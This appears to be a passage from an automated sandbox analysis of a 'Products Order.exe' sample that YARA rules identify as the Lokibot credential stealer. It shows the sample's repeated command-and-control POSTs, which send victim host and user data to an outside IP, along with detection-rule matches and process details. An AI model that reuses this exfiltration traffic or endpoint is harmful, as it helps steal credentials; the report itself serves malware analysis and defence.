                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  47192.168.2.54976145.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:25.211848974 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:25.444598913 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:25.707920074 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:25 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  48192.168.2.54976245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:27.085627079 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:27.318540096 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:27.575263977 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  49192.168.2.54976345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:28.951649904 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:29.190665960 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:29.456072092 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  50192.168.2.54976445.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:30.894418001 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:31.136183023 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:31.400897026 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  51192.168.2.54976545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:33.811515093 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:34.045253038 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:34.303761959 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  52192.168.2.54976645.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:35.693093061 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:35.934741020 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:36.199531078 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  53192.168.2.54976745.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:37.577907085 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:37.818737984 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:38.095021009 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  54192.168.2.54976845.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:39.485061884 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:39.726444960 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:39.999092102 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  55192.168.2.54976945.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:41.388890982 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:41.627592087 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:41.892699957 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  56192.168.2.54977045.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:43.272419930 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:43.505400896 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:43.763044119 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  57192.168.2.54977145.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:45.151547909 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:45.387999058 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:45.647664070 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  58192.168.2.54977245.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:47.045717955 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:47.284497976 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:47.548430920 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:47 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  59192.168.2.54977345.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:50.123310089 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:50.359797001 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:50.619827986 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:50 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.54977445.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:52.000180006 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:52.240966082 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:52.514468908 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:52 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.54977545.90.57.51805352C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  May 16, 2024 00:38:53.898130894 CEST240OUTPOST /big/five/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: 45.90.57.51
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: BBECE576
                  Content-Length: 153
                  Connection: close
                  May 16, 2024 00:38:54.132042885 CEST153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                  Data Ascii: (ckav.rualfons134349ALFONS-PC0FDD42EE188E931437F4FBE2C
                  May 16, 2024 00:38:54.389626026 CEST236INHTTP/1.1 404 Not Found
                  Server: nginx/1.26.0
                  Date: Wed, 15 May 2024 22:38:54 GMT
                  Content-Type: text/html; charset=UTF-8
                  Content-Length: 23
                  Connection: close
                  X-Powered-By: PHP/5.4.16
                  Status: 404 Not Found
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:00:36:49
                  Start date:16/05/2024
                  Path:C:\Users\user\Desktop\Products Order.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\Products Order.exe"
                  Imagebase:0x430000
                  File size:775'680 bytes
                  MD5 hash:AB09F11DDB556069549717CC1F37FDC1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:00:36:50
                  Start date:16/05/2024
                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Imagebase:0x10000
                  File size:56'368 bytes
                  MD5 hash:FDA8C8F2A4E100AFB14C13DFCBCAB2D2
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                  • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                  • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                  • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                  • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:moderate
                  Has exited:false

                  Reset < >

                    Execution Graph

                    Execution Coverage:24.6%
                    Dynamic/Decrypted Code Coverage:100%
                    Signature Coverage:0%
                    Total number of Nodes:15
                    Total number of Limit Nodes:0

                    Callgraph

                    • Executed
                    • Not Executed
                    • Opacity -> Relevance
                    • Disassembly available
                    callgraph 0 Function_00007FF848F10678 1 Function_00007FF848F1227C 2 Function_00007FF848F1447D 3 Function_00007FF848F101FD 4 Function_00007FF848F123FD 5 Function_00007FF848F10500 6 Function_00007FF848F10E01 60 Function_00007FF848F10D60 6->60 61 Function_00007FF848F10DE0 6->61 7 Function_00007FF848F10D81 7->60 8 Function_00007FF848F10E81 9 Function_00007FF848F10D05 10 Function_00007FF848F11287 11 Function_00007FF848F10488 12 Function_00007FF848F10288 13 Function_00007FF848F1000A 14 Function_00007FF848F1060D 15 Function_00007FF848F10F0D 42 Function_00007FF848F104C8 15->42 54 Function_00007FF848F104D8 15->54 16 Function_00007FF848F11B0E 17 Function_00007FF848F13B0E 18 Function_00007FF848F12410 19 Function_00007FF848F10A11 19->11 20 Function_00007FF848F13493 21 Function_00007FF848F11815 21->16 22 Function_00007FF848F10520 23 Function_00007FF848F10EA0 24 Function_00007FF848F10AA1 24->11 25 Function_00007FF848F132A8 26 Function_00007FF848F13DA9 27 Function_00007FF848F123AA 28 Function_00007FF848F125AC 29 Function_00007FF848F1012D 30 Function_00007FF848F100AD 31 Function_00007FF848F10F30 31->42 31->54 32 Function_00007FF848F12EB1 33 Function_00007FF848F13535 34 Function_00007FF848F108B6 34->11 35 Function_00007FF848F106BD 35->11 36 Function_00007FF848F10540 37 Function_00007FF848F10D41 38 Function_00007FF848F12544 39 Function_00007FF848F10DC5 40 Function_00007FF848F118C5 40->16 41 Function_00007FF848F112C6 42->10 43 Function_00007FF848F105CB 44 Function_00007FF848F142CD 45 Function_00007FF848F1014D 46 Function_00007FF848F10E4D 47 Function_00007FF848F104CD 48 